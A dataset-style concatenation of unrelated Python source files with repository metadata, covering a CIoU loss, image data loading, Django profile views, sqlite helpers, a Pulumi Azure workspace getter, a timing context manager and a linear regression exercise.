    boxes1_coor = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
                             boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
    boxes2_coor = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
                             boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
    boxes1_area = boxes1[..., 2] * boxes1[..., 3]
    boxes2_area = boxes2[..., 2] * boxes2[..., 3]
    # NOTE(review): naming is inverted here -- these "enclose_*" corners are
    # actually the intersection rectangle (max of mins / min of maxes).
    enclose_left_up = tf.maximum(boxes1_coor[..., :2], boxes2_coor[..., :2])
    enclose_right_down = tf.minimum(boxes1_coor[..., 2:], boxes2_coor[..., 2:])
    inter_section = tf.maximum(enclose_right_down - enclose_left_up, 0.0)
    inter_area = inter_section[..., 0] * inter_section[..., 1]#intersection
    union_area = boxes1_area + boxes2_area - inter_area#union
    iou = tf.math.divide_no_nan(inter_area, union_area)#intersection/union
    # Smallest box enclosing both boxes; c is its squared diagonal length.
    left_up = tf.minimum(boxes1_coor[..., :2], boxes2_coor[..., :2])
    right_down = tf.maximum(boxes1_coor[..., 2:], boxes2_coor[..., 2:])
    c = tf.maximum(right_down - left_up, 0.0)
    c = tf.pow(c[..., 0], 2) + tf.pow(c[..., 1], 2)
    # u is the squared distance between the two box centres.
    u = (boxes1[..., 0] - boxes2[..., 0]) * (boxes1[..., 0] - boxes2[..., 0]) + \
        (boxes1[..., 1] - boxes2[..., 1]) * (boxes1[..., 1] - boxes2[..., 1])
    d = tf.math.divide_no_nan(u, c)
    # Aspect-ratio consistency term, weighted by 4 / pi^2.
    ar_gt = tf.math.divide_no_nan(boxes2[..., 2] , boxes2[..., 3])
    ar_pred = tf.math.divide_no_nan(boxes1[..., 2], boxes1[..., 3])
    pi = tf.convert_to_tensor(np.pi)
    ar_loss = tf.math.divide_no_nan(4.0, pi * pi ) * tf.pow((tf.atan(ar_gt) - tf.atan(ar_pred)), 2)
    alpha = tf.math.divide_no_nan(ar_loss ,(1 - iou + ar_loss))
    ciou_term = d + alpha * ar_loss
    ciou = iou - ciou_term
    ciou = tf.clip_by_value(ciou, clip_value_min=-1.0, clip_value_max=0.99)
    return ciou
| [
"noreply@github.com"
] | mdrifaath786.noreply@github.com |
d37ef810b717ae73e12929618728d8b28a247649 | d471c59b8d18513f7963c301cf092664ac9ea2a9 | /PycharmProjects/python_basic_language/lambda.py | 0f094c16edd2262a753af0df342fb59e34b7a6a9 | [] | no_license | kinqston34/python_program | 296dd0e4aedded5aea9e17c2610b7f8ec6115f21 | 39f1b622804698611caf368c507153e4c77ad0fe | refs/heads/main | 2023-08-21T12:24:14.520036 | 2021-10-21T06:58:35 | 2021-10-21T06:58:35 | 383,711,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | def func(x,y,z):
# body of func(x, y, z) defined above: return the sum of the three arguments
return x+y+z
print(func(1,2,3))
#---------------------
# The same three-argument sum written as a lambda expression.
func2 = lambda x,y,z : x+y+z
print(func2(2,4,6))
#---------------------
def func(n):
    """Print 偶數 (even) or 奇數 (odd) depending on the parity of n."""
    parity = "偶數" if n % 2 == 0 else "奇數"
    print(parity)
# Same parity check as a lambda returning the string instead of printing it.
func2 = lambda n : "偶數" if n % 2 == 0 else "奇數"
print(func2(7777))
| [
"aa37741867@gmail.com"
] | aa37741867@gmail.com |
ff703a03633c91f322cfbf4945e385b28e55c3bc | 942252695ed89a6e7e1639d03ec4bcef39494112 | /cnn-image-classification/data_helpers.py | a29726e18853b6779e84f54a9a30214f654bacf7 | [] | no_license | hanke3/classification | 9f9073e50f9a12d55bb0abcc8ea6455d3aa64147 | c634647dda8db3ca038101b01829ca943e99cac5 | refs/heads/master | 2020-07-12T17:44:29.078729 | 2018-04-19T15:48:30 | 2018-04-19T15:48:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,030 | py | import numpy as np
import glob, os
from skimage import io, transform
def load_train_valid_data(data_directory, validation_percentage, image_size):
    """Load the image dataset and split it into train/validation sets.

    Returns (train_images, valid_images, train_labels, valid_labels); the
    image path arrays are decoded and resized through read_images().
    """
    # Load image paths and one-hot labels.
    print('Loading data...')
    x, y = load_images_and_labels(data_directory)
    print('Total images: {:d}'.format(len(y)))
    # Shuffle with a fixed seed so the split is reproducible.
    np.random.seed(10)
    shuffle_indexes = np.random.permutation(np.arange(len(y)))
    x_shuffled = x[shuffle_indexes]
    y_shuffled = y[shuffle_indexes]
    # Split off the validation tail; keep at least one validation sample.
    validation_indexes = -1 * int(validation_percentage * len(y))
    if validation_indexes == 0:
        validation_indexes = -1
    x_train, x_valid = x_shuffled[:validation_indexes], x_shuffled[
        validation_indexes:]
    y_train, y_valid = y_shuffled[:validation_indexes], y_shuffled[
        validation_indexes:]
    print('train/valid split: {:d}/{:d}'.format(len(x_train), len(x_valid)))
    print('')
    return read_images(x_train, image_size), read_images(
        x_valid, image_size), y_train, y_valid
def load_images_and_labels(data_directory):
    """Collect image paths from each class sub-directory with one-hot labels.

    Every direct sub-directory of *data_directory* is one class; its images
    ('.jpg'/'.jpeg', either case) all share the same one-hot label.
    """
    images = []
    labels = []
    sub_dirs = [walk_entry[0] for walk_entry in os.walk(data_directory)]
    num_classes = len(sub_dirs) - 1
    for class_index, sub_dir in enumerate(sub_dirs):
        if class_index == 0:
            continue  # the first walk entry is the root directory itself
        dir_name = os.path.basename(sub_dir)
        dir_images = []
        for ext in ['jpg', 'jpeg', 'JPG', 'JPEG']:
            pattern = os.path.join(data_directory, dir_name, '*.' + ext)
            dir_images.extend(glob.glob(pattern))
        images.extend(dir_images)
        one_hot = [0] * num_classes
        one_hot[class_index - 1] = 1
        labels.extend([one_hot for _ in dir_images])
    return np.array(images), np.array(labels)
def read_images(images, image_size):
    """Decode each image path and resize it to (image_size, image_size).

    Uses skimage's ``io``/``transform`` (imported at module level).
    NOTE(review): ``transform.resize`` normally returns float arrays --
    confirm the dtype expected by downstream consumers.
    """
    result = []
    print('\nReading images:')
    for i, im in enumerate(images):
        # print(str(i) + ' ' + im)
        img = io.imread(im)
        img = transform.resize(img, (image_size, image_size))
        result.append(img)
    return result
def batch_iter(data, batch_size, num_epochs, shuffle=True):
    """Yield successive mini-batches of ``data`` for ``num_epochs`` epochs.

    When ``shuffle`` is true the data is re-permuted at the start of every
    epoch; the last batch of an epoch may be smaller than ``batch_size``.
    """
    data = np.array(data)
    n_samples = len(data)
    # Ceiling division: one extra (short) batch for any remainder.
    batches_per_epoch = int((n_samples - 1) / batch_size) + 1
    for _ in range(num_epochs):
        if shuffle:
            data = data[np.random.permutation(np.arange(n_samples))]
        for batch_index in range(batches_per_epoch):
            lo = batch_index * batch_size
            hi = min(lo + batch_size, n_samples)
            yield data[lo:hi]
if __name__ == '__main__':
    # Smoke test: 10% validation split, 28x28 images from the sample dataset.
    data_directory = './data/flower_photos/'
    load_train_valid_data(data_directory, 0.1, 28)
| [
"984209543@qq.com"
] | 984209543@qq.com |
85760c7b0528d6889d1cf43b7eefd78ed695ab1a | e59f696a96f216cdeea8d638f05b75bb0c26ef55 | /4 Python_Programs/4 Problems on pattern printing/Program_17/Demo.py | e956a8e0ab0a7ab73a0efc26905055e9ebf05ea3 | [] | no_license | Aditya-A-Pardeshi/Coding-Hands-On | 6858686bdf8f4f1088f6cc2fc0035a53c4875d81 | 0d72d45e92cb0698129636412f7bf5a8d865fd2f | refs/heads/main | 2023-05-29T05:35:34.052868 | 2021-06-14T18:52:57 | 2021-06-14T18:52:57 | 376,928,262 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | '''
Accept number of rows and number of columns from user and display below
pattern.
Input : iRow = 3 iCol = 4
Output :
1 2 3 4
5 6 7 8
9 10 11 12
'''
def Display(row, col):
    """Print a ``row`` x ``col`` grid of consecutive integers starting at 1.

    Negative dimensions are treated as their absolute values, mirroring the
    original sign-flip behaviour.
    """
    counter = 1
    row = abs(row)
    col = abs(col)
    for _ in range(row):
        for _ in range(col):
            print(counter, end=" ")
            counter += 1
        print("")
def main():
    # Read grid dimensions interactively and render the number pattern.
    row = int(input("Enter row value: "));
    col = int(input("Enter column value: "));
    Display(row,col);

if __name__ == "__main__":
    main();
"adityapardeshi0078@gmail.com"
] | adityapardeshi0078@gmail.com |
61c46f8fe132afc892a621b3c9e20f9587f13a78 | f30b91db647dca1f77fffa4b7e26b6c6a68abbc6 | /8_kyu/Geometry Basics: Distance between points in 2D/distance_between_points.py | f6923c4d49f908ea1a428b1771bf931288251673 | [] | no_license | estraviz/codewars | 73caf95519eaac6f34962b8ade543bf4417df5b7 | 5f8685e883cb78381c528a0988f2b5cad6c129c2 | refs/heads/master | 2023-05-13T07:57:43.165290 | 2023-05-08T21:50:39 | 2023-05-08T21:50:39 | 159,744,593 | 10 | 55 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | """Geometry Basics: Distance between points in 2D
"""
from math import hypot
def distance_between_points(a, b):
    """Euclidean distance between two 2D points exposing ``x``/``y`` attributes."""
    dx = a.x - b.x
    dy = a.y - b.y
    return hypot(dx, dy)
| [
"javier.estraviz@gmail.com"
] | javier.estraviz@gmail.com |
86961c0157bd2cf6a3df6b8b6c798751c6d2f2ca | ce8a52a91d69aac8d1ebd597c4234d677b6a85ec | /users/views.py | 1e02ca728641f7716df02b4bef303455b28dd38d | [] | no_license | Yazanmuf/django-project | 702b54d8c6faa00960ebd1fb5078d97c358d526e | 5d82d054f14c07147544554e6e4ab3a3ab6db413 | refs/heads/master | 2020-03-31T18:55:14.022390 | 2018-10-13T22:58:27 | 2018-10-13T22:58:27 | 152,478,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,360 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, ProfileUpdateForm, UserUpdateForm
def register(request):
    """Handle user sign-up.

    GET renders an empty registration form; a valid POST creates the account,
    flashes a success message and redirects to the login page.  An invalid
    POST falls through and re-renders the bound form with its errors.

    Fix: removed the unused local ``username`` (the ``cleaned_data.get``
    call had no effect).
    """
    if request.method == 'POST':
        form = UserRegisterForm(request.POST)
        if form.is_valid():
            form.save()
            messages.success(request, f'Your account has been created!')
            return redirect('login')
    else:
        form = UserRegisterForm()
    return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
    """Display and update the logged-in user's account and profile forms.

    On a valid POST both forms are saved and the user is redirected back to
    the profile page; otherwise (GET or invalid POST) the forms are rendered.
    """
    if request.method == 'POST':
        u_form = UserUpdateForm(request.POST, instance=request.user)
        p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)
        if u_form.is_valid() and p_form.is_valid():
            u_form.save()
            p_form.save()
            messages.success(request, f'Your account has been updated')
            return redirect('profile')
    else:
        u_form = UserUpdateForm(instance=request.user)
        p_form = ProfileUpdateForm(instance=request.user.profile)
    return render(request, 'users/profile.html', {'u_form': u_form, 'p_form': p_form})
| [
"ymufleh@gmail.com"
] | ymufleh@gmail.com |
b8a36168d13594a00333c7f951c11beaa75d402a | 82ca891008793f570668a7f2c760ae0f22d40494 | /src/VAMPzero/Component/Fuselage/Aerodynamic/cD0c.py | 58d77c91fd0adbc2cce1979d98d9018b2d3fadb0 | [
"Apache-2.0"
] | permissive | p-chambers/VAMPzero | 22f20415e83140496b1c5702b6acbb76a5b7bf52 | 4b11d059b1c7a963ec7e7962fa12681825bc2f93 | refs/heads/master | 2021-01-19T10:49:06.393888 | 2015-06-24T10:33:41 | 2015-06-24T10:33:41 | 82,208,448 | 1 | 0 | null | 2017-02-16T17:42:55 | 2017-02-16T17:42:55 | null | UTF-8 | Python | false | false | 2,300 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Copyright: Deutsches Zentrum fuer Luft- und Raumfahrt e.V., 2015 (c)
Contact: daniel.boehnke@dlr.de and jonas.jepsen@dlr.de
'''
from VAMPzero.Handler.Parameter import parameter
class cD0c(parameter):
    '''
    Component zero lift drag coefficient of the fuselage

    :Unit: [ ]
    :Wiki: http://en.wikipedia.org/wiki/Drag_coefficient
    '''

    # NOTE(review): the class docstring above is forwarded to the parameter
    # base class as ``doc=self.__doc__`` in __init__, so its text is runtime
    # data for VAMPzero's documentation machinery -- do not edit it casually.

    def __init__(self, value=0., unit='', parent='', cpacsPath=''):
        super(cD0c, self).__init__(value=value, unit=unit, doc=self.__doc__, status='init', parent=parent,
                                   cpacsPath=cpacsPath)

    def calc(self):
        '''
        Calculates the zero lift drag coefficient from the wetted area and the friction coefficients

        :Source: Aircraft Design: A Conceptual Approach, D. P. Raymer, AIAA Education Series, 1992, Second Edition, p. 281, Eq. 12.24

        .. todo:

           calc CD0c: find equation for estimate laminar / turbulent transition point
        '''
        # All inputs are sibling parameters on the owning fuselage component.
        wetArea = self.parent.wetArea.getValue()
        cfLAM = self.parent.cfLAM.getValue()
        cfTURB = self.parent.cfTURB.getValue()
        formFactor = self.parent.formFactor.getValue()
        dragArea = self.parent.dragArea.getValue()
        nLam = self.parent.nLam.getValue()

        # Skin-friction term: laminar/turbulent mix weighted by nLam (laminar
        # fraction), scaled by form factor and wetted area, plus the parasite
        # drag-area term.
        return self.setValueCalc((nLam * cfLAM + (1 - nLam) * cfTURB) * formFactor * wetArea + dragArea)
###################################################################################################
#EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFE#
################################################################################################### | [
"daniel.boehnke@dlr.de"
] | daniel.boehnke@dlr.de |
a1aa2aa3a36845ae772f870971bceef5bb569802 | be75ec9fdb9a1c972a336b0d56b748e530f73e64 | /jour5/exo1/connection.py | 685f643f5305ad29c0ae91deb47faec406adb4f2 | [] | no_license | linda-jemni/Python-Linda-Jemni | bdb6cffa0c9a4a0f42d22ae2ef2b975e6d839fbd | 793165092e37223b6db761f2697ba2a6c2ff52c8 | refs/heads/master | 2023-01-29T20:47:13.883261 | 2020-12-11T14:57:14 | 2020-12-11T14:57:14 | 319,301,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | import sqlite3
from sqlite3 import Error
def create_connection(db_file):
    """Open a SQLite connection to ``db_file``.

    Returns the connection object, or ``None`` when sqlite3 raises an
    ``Error`` (the error is printed rather than propagated, preserving the
    original best-effort behaviour).

    Fix: the original had a ``return`` inside the ``try`` plus an identical
    trailing ``return``, leaving dead code; the flow is now explicit.
    """
    try:
        return sqlite3.connect(db_file)
    except Error as e:
        print(e)
        return None
def create_table(conn, create_table_sql):
    """Run the DDL script ``create_table_sql`` on ``conn``.

    Despite the name, ``executescript`` may run several statements; any
    sqlite ``Error`` is printed instead of being raised.
    """
    try:
        conn.cursor().executescript(create_table_sql)
    except Error as e:
        print(e)
if __name__ == '__main__':
    # Smoke test: opens (and creates on first run) the db_exo1.db file on disk.
    cnnx = create_connection("db_exo1.db")
"linda@gmail.com"
] | linda@gmail.com |
e07afaa7913aa1174d7b1fec1f1178ee1145a5c1 | 96c68bae89e82ede1f98d49bae68a7c394397454 | /producer/twitterCrdExample.py | 62346ae14f1a2897051920d0dddcdba932ace3aa | [] | no_license | llopacki/twitterapp | e22cf68072ee043f6ea44e55a31bf18d3b772c0c | 2f36b22f202e4bd817e9eca1e4e7e8f940bb496f | refs/heads/master | 2022-11-16T08:06:36.129781 | 2019-09-16T18:17:19 | 2019-09-16T18:17:19 | 208,598,219 | 0 | 2 | null | 2022-11-03T00:24:50 | 2019-09-15T13:28:07 | Python | UTF-8 | Python | false | false | 338 | py | ## AWS credentials
## twitterCrd.py
## This is a stub for twitterCrd.py file (not committed into the git repo
## Remember to create twitterCrd.py file with following content with your twitter developer creds
# Security note: keep the real twitterCrd.py out of version control; these
# placeholders must be replaced with your own Twitter developer credentials.
consumer_key = "FillThisOut"
consumer_secret = "FillThisOut"
access_token_key = "FillThisOut"
access_token_secret = "FillThisOut"
"leslaw@lopacki.net"
] | leslaw@lopacki.net |
cd963e4397fff6a989fbdd6cd2a95fffb0e8afb2 | 46e9b1c288d0dd5f627af376d7660903bc0e715f | /three_function.py | 74c70f34d511fab9ba2a45ac0e11fe5d08b6304a | [] | no_license | doktorkto/AU | 3e075f1cf9c5ba6254c0c210f057cb9bf5a92da9 | 77a04c779270bec467cfa8637bfa683690e726ae | refs/heads/master | 2021-07-15T14:54:15.256777 | 2020-09-28T07:51:21 | 2020-09-28T07:51:21 | 212,978,983 | 0 | 0 | null | 2019-12-18T08:10:44 | 2019-10-05T10:07:36 | null | UTF-8 | Python | false | false | 456 | py | def gcd(a, b):
if b == 0:
return a
else:
return gcd(b, a % b)
def bezout(a, b):
    """Extended Euclid: return ``(x, y, g)`` with ``a*x + b*y == g == gcd(a, b)``."""
    if b == 0:
        return (1, 0, a)
    x_next, y_next, g = bezout(b, a % b)
    # Back-substitute the coefficients from the recursive step.
    return (y_next, x_next - (a // b) * y_next, g)
def phi(n):
    """Euler's totient: count of integers in [1, n] coprime to ``n``.

    Uses the product formula over distinct prime factors.  Fixes the
    original, which used true division (``/=`` and ``result / i``) and so
    returned floats; integer division keeps the result exact (each prime
    factor always divides the running result).  Trial division is also
    bounded by sqrt(n) instead of n, which does not change any result.
    """
    result = n
    i = 2
    while i * i <= n:
        if n % i == 0:
            # Strip every power of this prime, then apply (1 - 1/i) exactly.
            while n % i == 0:
                n //= i
            result -= result // i
        i += 1
    if n > 1:
        # Whatever remains is a single prime factor larger than sqrt(n).
        result -= result // n
    return result
| [
"noreply@github.com"
] | doktorkto.noreply@github.com |
6a28e526071a3ed9e27c052baf196cfc9543df92 | 742b958155434ce081f736153a11d4642b1e91c8 | /src/plugins/widgets/author/AuthorWidget.py | a097ef8da2345c21542c5185f05d397b2e4100a0 | [] | no_license | MozzieCN/alienblog | 5bb2b54653d24c90e2b14564ffe71a7e008b6a9c | cb2bbe76e61284d8c68e922b48c0bf0ca0e0970c | refs/heads/master | 2016-09-06T11:32:54.524664 | 2011-12-04T16:07:36 | 2011-12-04T16:07:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,353 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# plugins.widgets.author.AuthorWidget.py
#
# Copyright 2011 feiyd
#
# Created on 2011-11-25
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
from contrlib import plugin
class AuthorWidget(plugin.Widget):
    """Widget rendering a post author's Gravatar avatar plus a name/link block."""

    # Gravatar URL template: %s = email hash, %d = pixel size, %s = default image.
    author_url='http://www.gravatar.com/avatar/%s?s=%d&r=X&d=%s'

    def __init__(self):
        plugin.Widget.__init__(self,'system.author.info')

    def parse(self,**kwords):
        """Build the author HTML: an <img> avatar and a <cite> name element,
        joined by CRLF.  Recognised keyword options: mail, width, height,
        avatar-class, author-info-class, url, name.
        """
        mail = kwords.pop('mail')
        width = kwords.pop('width',32)
        height = kwords.pop('height',32)
        cls = kwords.pop('avatar-class','avatar')
        if mail :
            # some computation or other (placeholder; original comment was Chinese)
            pass
        # NOTE(review): 'mail' is unconditionally overwritten with a
        # hard-coded hash below -- looks like a development stub; confirm
        # the real hashing of the mail address before shipping.
        mail = '98b58b690d0016861c6ee4c494f6677b'
        from alien.htmlwappers import Img,Div,tag,A
        img = Img(**{'class':cls})
        img.width=width
        img.height=height
        img.alt='default'
        img.src=self.author_url % (mail,width,'default-png')
        cls = kwords.pop('author-info-class','fn')
        url = kwords.pop('url','www.baidu.com')
        name = kwords.pop('name','呵呵')
        author_info=tag('cite',**{'class':cls})
        if not url:
            author_body = name
        else:
            # Wrap the name in a nofollow external link when a URL is given.
            author_body=A(body=name,
                **{
                'rel':'external nofollow',
                'href':url
                }
            ).render()
        author_info.body=author_body
        return '%s\r\n%s'%(img.render(),author_info.render())
| [
"feiyd000@gmail.com"
] | feiyd000@gmail.com |
df381849a14e46f5c7966add3272a9fb8d3c4827 | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/batchai/latest/get_workspace.py | fc07e25056127bae987a2af869402c135333a479 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 5,336 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetWorkspaceResult',
'AwaitableGetWorkspaceResult',
'get_workspace',
]
@pulumi.output_type
class GetWorkspaceResult:
    """
    Batch AI Workspace information.
    """
    # Auto-generated Pulumi output type: each constructor argument is
    # type-checked and stored via pulumi.set; the properties below read the
    # values back via pulumi.get.
    def __init__(__self__, creation_time=None, location=None, name=None, provisioning_state=None, provisioning_state_transition_time=None, tags=None, type=None):
        if creation_time and not isinstance(creation_time, str):
            raise TypeError("Expected argument 'creation_time' to be a str")
        pulumi.set(__self__, "creation_time", creation_time)
        if location and not isinstance(location, str):
            raise TypeError("Expected argument 'location' to be a str")
        pulumi.set(__self__, "location", location)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if provisioning_state and not isinstance(provisioning_state, str):
            raise TypeError("Expected argument 'provisioning_state' to be a str")
        pulumi.set(__self__, "provisioning_state", provisioning_state)
        if provisioning_state_transition_time and not isinstance(provisioning_state_transition_time, str):
            raise TypeError("Expected argument 'provisioning_state_transition_time' to be a str")
        pulumi.set(__self__, "provisioning_state_transition_time", provisioning_state_transition_time)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="creationTime")
    def creation_time(self) -> str:
        """
        Time when the Workspace was created.
        """
        return pulumi.get(self, "creation_time")
    @property
    @pulumi.getter
    def location(self) -> str:
        """
        The location of the resource
        """
        return pulumi.get(self, "location")
    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the resource
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """
        The provisioned state of the Workspace
        """
        return pulumi.get(self, "provisioning_state")
    @property
    @pulumi.getter(name="provisioningStateTransitionTime")
    def provisioning_state_transition_time(self) -> str:
        """
        The time at which the workspace entered its current provisioning state.
        """
        return pulumi.get(self, "provisioning_state_transition_time")
    @property
    @pulumi.getter
    def tags(self) -> Mapping[str, str]:
        """
        The tags of the resource
        """
        return pulumi.get(self, "tags")
    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of the resource
        """
        return pulumi.get(self, "type")
class AwaitableGetWorkspaceResult(GetWorkspaceResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable ``yield`` turns this method into a generator, which
        # is what makes instances awaitable; awaiting immediately returns a
        # plain (non-awaitable) GetWorkspaceResult copy of this object's fields.
        if False:
            yield self
        return GetWorkspaceResult(
            creation_time=self.creation_time,
            location=self.location,
            name=self.name,
            provisioning_state=self.provisioning_state,
            provisioning_state_transition_time=self.provisioning_state_transition_time,
            tags=self.tags,
            type=self.type)
def get_workspace(resource_group_name: Optional[str] = None,
                  workspace_name: Optional[str] = None,
                  opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWorkspaceResult:
    """
    Use this data source to access information about an existing resource.

    :param str resource_group_name: Name of the resource group to which the resource belongs.
    :param str workspace_name: The name of the workspace. Workspace names can only contain a combination of alphanumeric characters along with dash (-) and underscore (_). The name must be from 1 through 64 characters long.
    :return: An awaitable wrapper around the Batch AI workspace's details.
    """
    # Marshal arguments into the wire-format key names the provider expects.
    __args__ = dict()
    __args__['resourceGroupName'] = resource_group_name
    __args__['workspaceName'] = workspace_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # Default to this SDK's own version when the caller did not pin one.
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-nextgen:batchai/latest:getWorkspace', __args__, opts=opts, typ=GetWorkspaceResult).value
    return AwaitableGetWorkspaceResult(
        creation_time=__ret__.creation_time,
        location=__ret__.location,
        name=__ret__.name,
        provisioning_state=__ret__.provisioning_state,
        provisioning_state_transition_time=__ret__.provisioning_state_transition_time,
        tags=__ret__.tags,
        type=__ret__.type)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
04cda7ae9c02f4f7624eb6a296b392c87820e95d | b764137fd91d53a2abc2fa2ff29070a1e3eccfa9 | /datamol/utils/perf.py | d2aef2aff9e2a049d646a855a98ed6453d7b90e3 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | datamol-io/datamol | dca3449e07d3921e3075292271cbbdd96a8d8297 | 2619c610a6dfbf7cfc2a17f6619fecb5e3eee61b | refs/heads/main | 2023-07-27T16:35:17.909994 | 2023-07-27T15:39:23 | 2023-07-27T15:39:23 | 341,603,042 | 74 | 12 | Apache-2.0 | 2023-09-04T13:10:51 | 2021-02-23T15:39:33 | Python | UTF-8 | Python | false | false | 1,885 | py | import time
from loguru import logger
duration_intervals = (
    ("weeks", 604800),  # 60 * 60 * 24 * 7
    ("days", 86400),  # 60 * 60 * 24
    ("h", 3600),  # 60 * 60
    ("min", 60),
    ("s", 1),
    ("ms", 1e-3),
    ("us", 1e-6),
)


def human_duration(seconds: float, granularity: int = 1):
    """Render ``seconds`` as a short human-readable string (e.g. ``"1h"``).

    At most ``granularity`` of the largest non-zero units are kept,
    joined by ``", "``.
    """
    parts = []
    remaining = seconds
    for unit, size in duration_intervals:
        count = remaining // size
        if not count:
            continue
        remaining -= count * size
        parts.append(f"{count:.0f}{unit}")
    return ", ".join(parts[:granularity])
class watch_duration:
    """Context manager that measures the wall-clock time of its block.

    On exit the elapsed time is stored on ``start``, ``end``, ``duration``
    (seconds) and ``duration_minutes``.  When ``log`` is true the duration is
    also logged -- human-formatted by default, or as plain minutes when
    ``log_human_duration`` is false.

    Example:
        with watch_duration(log=True) as w:
            do_work()
        print(w.duration)
    """

    def __init__(self, log: bool = True, log_human_duration: bool = True):
        self.log = log
        self.log_human_duration = log_human_duration
        self.start = None
        self.end = None
        self.duration = None
        self.duration_minutes = None

    def __enter__(self):
        self.start = time.time()
        return self

    def __exit__(self, *_):
        assert self.start is not None
        self.end = time.time()
        self.duration = self.end - self.start
        self.duration_minutes = self.duration / 60
        if not self.log:
            return
        if self.log_human_duration:
            logger.info(f"Duration {human_duration(self.duration)}.")
        else:
            logger.info(f"Duration {self.duration_minutes:.2f} minutes")
| [
"hadrien.mary@gmail.com"
] | hadrien.mary@gmail.com |
96ea20bb9984d253e19134cd2d3507cf14a9e719 | 6529e4dd8be00788f24aa46ed079d3959c28b4b8 | /Case Studies/Regression Analysis/Regression.py | 672fbe20cdacb6144b5c0cef107e26039765db5a | [] | no_license | jmalisano/Using_Python_for_Research | f3e80b443dec5767a19e6c629ff94210a6ac7930 | 065eb995c2eab5f31aab70ecfece3c98fb627d5a | refs/heads/main | 2023-01-18T16:20:10.065500 | 2020-11-08T18:11:02 | 2020-11-08T18:11:02 | 311,122,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,705 | py | import numpy as np
import scipy.stats as ss
import matplotlib.pyplot as plt
#generate synthetic data
n = 100
beta_0 = 5
beta_1 = 2
np.random.seed(1)
x = ss.uniform.rvs(size = n)*10 #100 random variables between 0 and 10
y = beta_0+beta_1*x + ss.norm.rvs(loc=0, scale=1, size=n) #y=mx+c+noise. It is assumed that y=mx+c is the
plt.figure()
plt.plot(x,y, "o", ms=5)
xx = np.array([0, 10]) #lowest and highest x
plt.plot(xx, beta_0 + beta_1 * xx)
def compute_rss(y_estimate, y):
    """Residual sum of squares between observed ``y`` and the estimate."""
    residuals = y - y_estimate
    return sum(np.power(residuals, 2))
def estimate_y(x, b_0, b_1):
    """Evaluate the regression line ``b_0 + b_1 * x``."""
    return b_1 * x + b_0
#rss = compute_rss(estimate_y(x, beta_0, beta_1), y)
#we are attempting to estimate least squares
#in this we are pretendeding we already know beta0
rss = []
slopes = np.arange(-10, 15, 0.01)
for slope in slopes:
rss.append(np.sum((y - beta_0 - slope*x)**2)) #y - beta_0 - slope*x gives us difference between predicted y and observed y, doing for a range of slopes
ind_min = np.argmin(rss) #findex the index of the rss array that has the min value
#print("estimate for slope:", slopes[ind_min])
